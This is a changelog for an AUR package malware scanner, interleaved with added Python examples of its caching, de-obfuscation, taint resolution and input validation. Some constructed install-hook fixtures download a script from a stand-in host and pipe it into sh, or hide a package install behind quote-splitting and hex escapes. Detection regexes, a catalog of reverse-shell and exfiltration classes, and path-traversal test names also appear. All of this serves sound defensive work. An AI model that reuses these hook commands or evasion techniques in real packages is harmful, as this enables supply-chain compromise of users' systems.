Changelog

Current channels: stable 2.0.0 (aur-scanner / ks-aur-scanner). See Install for how the channels differ. Every release tag is GPG-signed — verify with git verify-tag v<version>.

This page tracks notable changes. The format follows Keep a Changelog; full per-release notes live on GitHub Releases.

2.0.0 — 2026-06-17 (stable)

Major release. Promotes the 1.2.0-rc1 line to stable. The default scan is unchanged — fully offline and static; everything new is opt-in or additive. Install with paru -S aur-scanner.

Added — opt-in threat intelligence

  • VirusTotal & URLhaus lookups. With enable_threat_intel set and your own key, the scanner checks declared sha256sums against VirusTotal and source= URLs against abuse.ch/URLhaus, emitting TI-VT-001 / TI-URLHAUS-001 on a malicious verdict. Off by default — only already-public hashes/URLs are sent, every lookup fails open, and all egress is isolated in one auditable file. See Threat Intelligence. The VirusTotal-by-hash idea came from @SuitablyMysterious (#9).
  • Active verdict cache. The per-user, MAC-authenticated cache now backs threat-intel lookups so repeat scans respect VirusTotal’s request quota; transient failures are never cached as a verdict.
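The two properties this entry relies on, shown in an added example that is not the scanner's own code: each cache entry carries a per-user HMAC bound to its lookup key, so a corrupt or altered entry is a miss rather than trusted data, and a lookup that fails transiently returns no verdict and is never written to the cache. The fake backend, the constructed hashes and the in-memory store are stand-ins (assumptions) for the real VirusTotal client and the on-disk cache.

```python
import hashlib
import hmac
import json
import os
import time
from typing import Callable, Optional

# Constructed per-user secret (assumption): the real scanner would generate it
# once and keep it 0600 inside the user's cache directory.
CACHE_KEY = os.urandom(32)

MALICIOUS, CLEAN = "malicious", "clean"


class TransientError(Exception):
    """The lookup produced no verdict: timeout, quota exhausted, 5xx, no network."""


def _tag(key: bytes, entry_key: str, payload: str) -> str:
    # The MAC covers the lookup key as well as the payload, so an entry cannot be
    # copied under a different hash.
    msg = entry_key.encode() + b"\0" + payload.encode()
    return hmac.new(key, msg, hashlib.sha256).hexdigest()


class VerdictCache:
    """In-memory stand-in for the on-disk cache. Every entry is 'payload\\ntag'."""

    def __init__(self, key: bytes) -> None:
        self._key = key
        self.store = {}  # entry_key -> serialized entry (one file per key on disk)

    def put(self, entry_key: str, verdict: str) -> None:
        payload = json.dumps({"verdict": verdict, "ts": int(time.time())})
        self.store[entry_key] = payload + "\n" + _tag(self._key, entry_key, payload)

    def get(self, entry_key: str) -> Optional[str]:
        raw = self.store.get(entry_key)
        if raw is None or "\n" not in raw:
            return None  # absent or corrupt: a miss, never trusted data
        payload, tag = raw.rsplit("\n", 1)
        if not hmac.compare_digest(tag, _tag(self._key, entry_key, payload)):
            return None  # tampered: also a miss
        try:
            return json.loads(payload)["verdict"]
        except (ValueError, KeyError, TypeError):
            return None


def lookup_sha256(sha256: str, backend: Callable[[str], str], cache: VerdictCache) -> Optional[str]:
    """Fail-open check of a declared checksum: a cached or fresh verdict, or None
    when the backend could not answer. Only definitive verdicts are cached, so a
    quota error today does not turn into a permanent 'clean' tomorrow."""
    cached = cache.get(sha256)
    if cached is not None:
        return cached
    try:
        verdict = backend(sha256)
    except TransientError:
        return None
    cache.put(sha256, verdict)
    return verdict


def demo() -> dict:
    calls = {}

    def fake_backend(h: str) -> str:  # constructed stand-in for the VirusTotal client
        calls[h] = calls.get(h, 0) + 1
        if h.startswith("deadbeef"):
            return MALICIOUS
        raise TransientError("quota exceeded")

    cache = VerdictCache(CACHE_KEY)
    bad = "deadbeef" + "0" * 56    # constructed sha256 with a malicious verdict
    flaky = "cafebabe" + "0" * 56  # constructed sha256 whose lookup keeps failing
    bad_results = (lookup_sha256(bad, fake_backend, cache), lookup_sha256(bad, fake_backend, cache))
    flaky_results = (lookup_sha256(flaky, fake_backend, cache), lookup_sha256(flaky, fake_backend, cache))
    # Flip the stored verdict without recomputing the tag: the entry must become a miss.
    cache.store[bad] = cache.store[bad].replace(MALICIOUS, CLEAN)
    return {
        "bad": bad_results + (calls[bad],),        # one backend call, second answer from cache
        "flaky": flaky_results + (calls[flaky],),  # two backend calls, nothing cached
        "tampered": cache.get(bad),                # None
    }


if __name__ == "__main__":
    print(demo())
```

The point of `compare_digest` is constant-time comparison of the tag; the point of binding the key into the MAC is that an attacker who can write to the cache directory cannot promote a verdict from one hash to another even with a valid-looking entry.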

Added — broader coverage & integrations

  • Every maintained AUR helper is covered by the system audit and the pacman hook — yay, paru, pikaur, aura, pakku, trizen, aurutils, rua, pat-aur — at each helper’s real PKGBUILD location. The shell integration also wraps pikaur/trizen/pakku alongside paru/yay.
  • Nushell integration (install/integration.nu) joins bash/zsh/fish.
  • --no-color global flag (and NO_COLOR env) for clean output in logs/CI.

Changed

  • -c/--config now applies to every command, including system — so a threat-intel config can VT-check every installed AUR package, not just scan.

1.2.0-rc1 — 2026-06-17 (release candidate — promoted to 2.0.0)

The release candidate that became 2.0.0 above. Lived in the repository while it baked, then shipped as stable 2.0.0.

1.1.0 — 2026-06-15 (stable)

Stable. Promotes the 1.1.0 release-candidate line and adds a second hardening wave that closes the residual evasion classes from an adversarial self-audit. Install with paru -S aur-scanner.

Detection — evasion classes closed

  • Variable-indirection (taint pass). A fetch/exec hidden behind a shell variable now resolves and is flagged — it used to trip nothing.
  • Case-insensitive analyzers, host-aware URL/IOC matching, and a supply-chain / packaging-metadata analyzer (dependency confusion, core-package displacement, signature theatre, sensitive backup=, malformed hashes).
  • Quote-aware printed-message filtering (a ; inside a quoted echo no longer false-positives).
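What a minimal variable-indirection pass looks like, as an added example rather than the scanner's taint pass: simple assignments are recorded, `$var` / `${var}` references are substituted (with a bounded number of rounds so cycles terminate), and only then is the fetch-pipe-exec rule applied. The hook text and the rule regex are constructed for the example; the real analyzer covers more expansion forms than this.

```python
import re
from typing import Dict, List

# Plain assignments a PKGBUILD hook can use to hide a command name or URL.
ASSIGN = re.compile(r"^\s*(?:local\s+|export\s+)?([A-Za-z_][A-Za-z0-9_]*)=(.*)$")
# $name and ${name}; other expansions (${name:-x}, $(...)) are left as they are.
REF = re.compile(r"\$\{([A-Za-z_][A-Za-z0-9_]*)\}|\$([A-Za-z_][A-Za-z0-9_]*)")
# A download piped straight into an interpreter (constructed rule).
FETCH_PIPE_EXEC = re.compile(r"\b(?:curl|wget)\b[^|\n]*\|\s*(?:sudo\s+)?(?:ba|z|da)?sh\b")


def _unquote(value: str) -> str:
    value = value.strip()
    if len(value) >= 2 and value[0] == value[-1] and value[0] in "\"'":
        return value[1:-1]
    return value


def _expand(text: str, env: Dict[str, str], max_rounds: int) -> str:
    # Bounded so a=$b, b=$a style cycles cannot spin forever.
    for _ in range(max_rounds):
        new = REF.sub(lambda m: env.get(m.group(1) or m.group(2), m.group(0)), text)
        if new == text:
            break
        text = new
    return text


def resolve_indirection(script: str, max_rounds: int = 8) -> str:
    """Return the script with $var / ${var} replaced by the literal value assigned
    earlier in the same text, so a rule written for 'curl ... | sh' also sees
    'f=curl; $f ... | sh'. Assignment lines themselves are kept verbatim."""
    env: Dict[str, str] = {}
    out: List[str] = []
    for line in script.splitlines():
        m = ASSIGN.match(line)
        if m:
            env[m.group(1)] = _expand(_unquote(m.group(2)), env, max_rounds)
            out.append(line)
        else:
            out.append(_expand(line, env, max_rounds))
    return "\n".join(out)


def find_fetch_pipe_exec(script: str) -> List[str]:
    """Stripped lines in which a fetched body is piped into a shell."""
    return [ln.strip() for ln in script.splitlines() if FETCH_PIPE_EXEC.search(ln)]


# Constructed post_install hook that hides both the fetcher and the URL behind variables.
SAMPLE_HOOK = """post_install() {
  local f=curl
  u='https://example.invalid/setup.sh'
  $f -fsSL "${u}" | sh
}
"""


def demo() -> dict:
    return {
        "raw": find_fetch_pipe_exec(SAMPLE_HOOK),                         # nothing: the rule sees only $f
        "resolved": find_fetch_pipe_exec(resolve_indirection(SAMPLE_HOOK)),  # one hit
    }


if __name__ == "__main__":
    print(demo())
```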

Hardening

  • Authenticated cache verdicts (per-user MAC), an allowlisted makepkg build environment, --force can never override an unscannable package, and --local only attributes a verdict to a name that provably matches.

Quality

  • A self-adversarial evasion fuzzer runs as a release gate — every malicious fixture is mutated through semantics-preserving evasion transforms and the gate must still block each variant.

Threat reports that informed this line: #2 (@LunarEclipse363) and #10 (@zebulon2).

1.1.0-rc2 — 2026-06-14 (release candidate)

Proactive detection expansion, prompted by a live obfuscated AUR campaign. Try it with paru -S aur-scanner-rc.

Anti-evasion

  • De-obfuscation pass. A new wave hid a bun add <js-payload> in a post_install hook using ANSI-C quoting ($'\x63') and adjacent-quote word-splitting ("b"'u''n') — the previous RC caught it only as a generic high “hex payload.” The scanner now decodes ANSI-C escapes and collapses quote-splitting, then runs every rule against the decoded text, so the whole catalog resists this evasion at once. That sample is now correctly flagged critical.
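An added example of the decoding step this entry describes, written for this page and not taken from the scanner: ANSI-C `$'...'` strings are decoded, quote delimiters are removed so adjacent fragments collapse into one word, and the rules then run against the decoded view. The `.install` hook text and the package-manager rule are constructed; the decoder deliberately passes variables, operators and comments through untouched.

```python
import re
from typing import List

_HEX = "0123456789abcdefABCDEF"
_OCT = "01234567"
_SIMPLE = {"n": "\n", "t": "\t", "r": "\r", "a": "\a", "b": "\b", "f": "\f",
           "v": "\v", "e": "\x1b", "E": "\x1b", "\\": "\\", "'": "'", '"': '"'}


def _ansi_c(body: str) -> str:
    """Decode the escapes bash accepts inside $'...' (\\xHH, \\nnn, \\n, \\e, ...)."""
    out, i = [], 0
    while i < len(body):
        c = body[i]
        if c != "\\" or i + 1 >= len(body):
            out.append(c)
            i += 1
            continue
        e = body[i + 1]
        if e == "x":
            j = i + 2
            while j < len(body) and j < i + 4 and body[j] in _HEX:
                j += 1
            if j > i + 2:
                out.append(chr(int(body[i + 2:j], 16)))
                i = j
                continue
        elif e in _OCT:
            j = i + 1
            while j < len(body) and j < i + 4 and body[j] in _OCT:
                j += 1
            out.append(chr(int(body[i + 1:j], 8)))
            i = j
            continue
        elif e in _SIMPLE:
            out.append(_SIMPLE[e])
            i += 2
            continue
        out.append(c)  # unknown escape: keep the backslash, as bash does
        i += 1
    return "".join(out)


def _find_close(text: str, start: int, quote: str, backslash_escapes: bool) -> int:
    i = start
    while i < len(text):
        if backslash_escapes and text[i] == "\\":
            i += 2
            continue
        if text[i] == quote:
            return i
        i += 1
    return len(text)  # unterminated: the rest of the text is the string


def decode_quoting(text: str) -> str:
    """The view rules are matched against: $'...' decoded and quote delimiters
    removed, so "b"'u''n' collapses to bun. A '#' that starts a comment is copied
    through without being read as the start of a quoted string."""
    out: List[str] = []
    i, n = 0, len(text)
    while i < n:
        c = text[i]
        if c == "$" and text.startswith("$'", i):
            end = _find_close(text, i + 2, "'", backslash_escapes=True)
            out.append(_ansi_c(text[i + 2:end]))
            i = end + 1
        elif c == "'":
            end = _find_close(text, i + 1, "'", backslash_escapes=False)
            out.append(text[i + 1:end])
            i = end + 1
        elif c == '"':
            end = _find_close(text, i + 1, '"', backslash_escapes=True)
            out.append(re.sub(r'\\([\\"$`])', r"\1", text[i + 1:end]))
            i = end + 1
        elif c == "#" and (i == 0 or text[i - 1] in " \t\n;&|("):
            end = text.find("\n", i)
            end = n if end == -1 else end
            out.append(text[i:end])
            i = end
        elif c == "\\" and i + 1 < n:
            out.append(text[i:i + 2])  # escaped character outside quotes: keep as-is
            i += 2
        else:
            out.append(c)
            i += 1
    return "".join(out)


# Constructed rule for language package managers run from an install hook.
HOOK_PKG_MANAGER = re.compile(r"\b(?:bun|npm|pnpm|yarn|pip|pip3|cargo)\s+(?:add|install)\b")

# Constructed .install hook modelled on the evasion described above.
SAMPLE_HOOK = r"""post_install() {
  # nothing to see here
  "b"'u''n' add $'\x65\x76\x69\x6c'-helper >/dev/null 2>&1
}
"""


def find_hook_package_installs(text: str) -> List[str]:
    """Stripped lines on which a package manager is invoked; run on decode_quoting(text)."""
    return [ln.strip() for ln in text.splitlines() if HOOK_PKG_MANAGER.search(ln)]
```

Running the rule on the raw hook finds nothing; running it on `decode_quoting(SAMPLE_HOOK)` reports the `bun add` line. Because the decoding happens once, before any rule, every rule in the catalog benefits without being rewritten.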

Detection — catalog 72 → 106 codes

  • Reverse/bind shells beyond bash/nc: perl, php, ruby/lua/awk, node, openssl s_client, mkfifo backpipe, busybox-nc/telnet/ncat-ssl.
  • Exfiltration: DNS tunnelling, HTTP upload, Slack/Teams webhooks, anonymous file-drop/tunnel hosts, environment dumps, cloud/CI credential + keyring/wallet access.
  • Auth & system tampering: privileged-account creation, password changes, writes to the auth database, doas/NOPASSWD, PAM, pacman SigLevel=Never, disabling security controls, rogue CA trust anchors.
  • Supply-chain trust: pacman-key / gpg key imports, package-index overrides, obfuscated IPs in source URLs.
  • More obfuscation & RCE forms: printf assembly, base32/16 decode, interpreter here-strings, sh -c "$(curl)", detached setsid/nohup.

Other

  • aur-scan install cleans up its own build directory after a successful install (--keep-build to retain).

1.1.0-rc1 — 2026-06-13 (release candidate)

Security-hardening release resolving a full security & quality audit. Try it with paru -S aur-scanner-rc; read the behavior changes before pointing automation at it.

⚠️ Behavior changes (read before upgrading)

  • The scanner now fails closed. The paru/yay wrapper and the pacman hook previously continued past a fetch/scan error, a timeout, or a non-interactive prompt; they now deny in those cases. If you drive paru/yay from a script, cron, or CI (no TTY), an install that can’t be fully analyzed is refused rather than silently proceeding. A security gate that fails open is not a gate.
  • scan --format json / --format sarif emit only the machine document on stdout. The human-readable summary moved to stderr, so aur-scan scan --format json | jq works. If you scraped the summary out of stdout, read stderr instead.

Security

  • Input-validation chokepoint for package names/bases — illegal identifiers are rejected before they can become URL path segments or filesystem paths, closing a path-traversal vector and request-injection into the AUR RPC.
  • Network hardening: redirects refused, HTTPS-only enforced, response bodies size-capped (streaming), all RPC URLs percent-encoded.
  • Pacman hook drops root (groups → gid → uid, verified irreversible) before reading user cache files, validates names, and refuses symlinked PKGBUILDs.
  • Detection-evasion fixes: backslash-newline line-continuation splicing; quote- and comment-aware brace scanning (no more echo "}" / # } truncation); broadened reverse-shell and bare crypto-address detection; checksum SKIP-laundering closed across all hash arrays.
  • Dependency advisory RUSTSEC-2026-0007 resolved (bytes → 1.11.1).
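A sketch of the input-validation chokepoint from the first bullet, added here as an example and not the scanner's code: one validator that every package name passes before it is used as an RPC query value, a cgit path parameter, or a cache directory, with percent-encoding on the URL side and a resolved-path containment check on the filesystem side. The naming rule is my reading of the AUR/pacman convention (assumption), and the `v=5&type=info` query form is the one I know the AUR RPC accepts.

```python
import re
from pathlib import Path
from typing import Iterable
from urllib.parse import quote, urlencode

# Assumed AUR/pacman naming rule: lowercase alphanumerics plus @ . _ + -, and the
# name may not start with '-' or '.'. Check the Arch wiki before relying on the set.
NAME_RE = re.compile(r"[a-z0-9@_+][a-z0-9@._+-]*")
MAX_NAME_LEN = 255

AUR_RPC = "https://aur.archlinux.org/rpc/"
AUR_PLAIN = "https://aur.archlinux.org/cgit/aur.git/plain/PKGBUILD"


class InvalidPackageName(ValueError):
    """Raised at the single chokepoint every name passes before it becomes a URL
    segment or a filesystem path."""


def validate_name(name: str) -> str:
    if not isinstance(name, str) or not 0 < len(name) <= MAX_NAME_LEN:
        raise InvalidPackageName(f"bad length: {name!r}")
    if not NAME_RE.fullmatch(name):
        raise InvalidPackageName(f"illegal package name: {name!r}")
    return name


def rpc_info_url(names: Iterable[str]) -> str:
    """RPC 'info' query with every name validated, then percent-encoded by urlencode."""
    params = [("v", "5"), ("type", "info")] + [("arg[]", validate_name(n)) for n in names]
    return AUR_RPC + "?" + urlencode(params)


def plain_pkgbuild_url(pkgbase: str) -> str:
    """cgit 'plain' URL for a PKGBUILD; safe="" so even '/' would be encoded."""
    return AUR_PLAIN + "?h=" + quote(validate_name(pkgbase), safe="")


def pkgbuild_path(cache_root: Path, pkgbase: str) -> Path:
    """Per-package PKGBUILD path under the cache root. validate_name already rules
    out '/', '..' and leading dots; the resolved-path check is the second line of
    defence and also catches a package directory that is a symlink out of the root."""
    root = cache_root.resolve()
    pkgdir = (root / validate_name(pkgbase)).resolve()
    if pkgdir.parent != root:
        raise InvalidPackageName(f"{pkgbase!r} escapes {root}")
    return pkgdir / "PKGBUILD"


def is_rejected(name: str) -> bool:
    try:
        validate_name(name)
    except InvalidPackageName:
        return True
    return False


def demo() -> dict:
    # Constructed inputs: a few names that must pass and a few that must not.
    return {
        "accepted": [validate_name(n) for n in ("yay", "aur-scanner", "python-foo+bar")],
        "rejected": [n for n in ("../../etc/passwd", "yay?type=search", "-rf", ".hidden", "Yay", "a b")
                     if is_rejected(n)],
        "rpc": rpc_info_url(["yay", "paru"]),
        "path_tail": pkgbuild_path(Path("/var/cache/aur-scan-demo"), "yay").parts[-2:],
    }


if __name__ == "__main__":
    print(demo())
```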

Added

  • SRC-007: warns when a VCS source isn’t pinned to a commit (Low).
  • CLI integration suite that runs the real binary against PKGBUILD fixtures.
  • CI (format, clippy-as-error, tests, release build) and cargo-deny supply-chain gating, plus a weekly advisory scan.
  • The rolling aur-scanner-git package now verifies the signed HEAD commit at build time.

Fixed

  • False positive: a printed "...~/.config/..." note no longer trips HIDDEN-001 (it mentions a path; it doesn't write one) — seen on google-chrome and visual-studio-code-bin.
  • Parser: source+=(...) appends are no longer dropped; inline comments are handled quote-aware; single-line function bodies are captured.
  • Cache writes are atomic (0600) in an owner-only (0700) directory, entries are key-bound, and a corrupt entry is a miss rather than trusted data.
  • Provenance store distinguishes an absent baseline from a corrupt one.
  • Removed a panicking AurClient::default() and a response unwrap.
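The parser fixes in this release and the brace-scanning fix in the Security list above (backslash-newline splicing; quote- and comment-aware brace matching so `echo "}"` or `# }` does not end a function early; `source+=(...)` appends; single-line function bodies) are illustrated by the following added example. It is written for this page, not taken from the scanner, and the PKGBUILD it parses is constructed.

```python
import re
import shlex
from typing import Dict, List


def splice_continuations(text: str) -> str:
    """Join backslash-newline pairs as bash does, before any line-based rule runs."""
    return text.replace("\\\n", "")


def _skip_quoted(text: str, j: int) -> int:
    """j points at an opening quote; return the index just past its closing quote."""
    q, k = text[j], j + 1
    while k < len(text) and text[k] != q:
        if q == '"' and text[k] == "\\":
            k += 1  # \" inside double quotes does not close the string
        k += 1
    return k + 1


def _is_comment_start(text: str, j: int) -> bool:
    return text[j] == "#" and (j == 0 or text[j - 1] in " \t\n;&|(")


def extract_functions(text: str) -> Dict[str, str]:
    """Map function name -> body with brace depth tracked outside quotes and comments."""
    text = splice_continuations(text)
    head = re.compile(r"(?:function\s+)?([A-Za-z_][A-Za-z0-9_]*)\s*\(\)\s*\{")
    funcs: Dict[str, str] = {}
    i, n = 0, len(text)
    while True:
        m = head.search(text, i)
        if not m:
            return funcs
        start = j = m.end()
        depth = 1
        while j < n and depth:
            c = text[j]
            if c == "\\":
                j += 2
            elif c in "'\"":
                j = _skip_quoted(text, j)
            elif _is_comment_start(text, j):
                j = text.find("\n", j)
                j = n if j == -1 else j
            else:
                depth += (c == "{") - (c == "}")
                j += 1
        funcs[m.group(1)] = text[start:j - 1] if depth == 0 else text[start:j]
        i = j


def _array_end(text: str, j: int) -> int:
    """Index of the ')' that closes an array opened just before j."""
    n = len(text)
    while j < n:
        c = text[j]
        if c == "\\":
            j += 2
        elif c in "'\"":
            j = _skip_quoted(text, j)
        elif _is_comment_start(text, j):
            j = text.find("\n", j)
            if j == -1:
                return n
        elif c == ")":
            return j
        else:
            j += 1
    return n


def collect_array(text: str, name: str) -> List[str]:
    """Entries of name=( ... ) plus every later name+=( ... ); quote-aware, comments dropped."""
    text = splice_continuations(text)
    items: List[str] = []
    pat = re.compile(r"^[ \t]*" + re.escape(name) + r"(\+?=)\(", re.M)
    for m in pat.finditer(text):
        end = _array_end(text, m.end())
        words = shlex.split(text[m.end():end], comments=True)
        items = words if m.group(1) == "=" else items + words
    return items


# Constructed PKGBUILD exercising every case named above.
SAMPLE_PKGBUILD = r"""pkgname=demo
source=("https://example.invalid/demo-1.0.tar.gz" # upstream
        'local.patch')
source+=("https://example.invalid/extra.sh")
sha256sums=('SKIP' \
            'SKIP')
build() {
  echo "}"   # not the end of the function
  # }
  make
}
check() { echo "ok"; }
"""
```

Dropping a `source+=` append silently is the worse failure of the two: a URL that is never parsed is a URL no rule ever inspects.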

1.0.3 and earlier

Released before this changelog was introduced. See the GitHub Releases for 1.0.3 (race-free install, dependency-tree SBOM), 1.0.1 (INSTALL-004 — language package managers in install hooks), and 1.0.0 (first public release).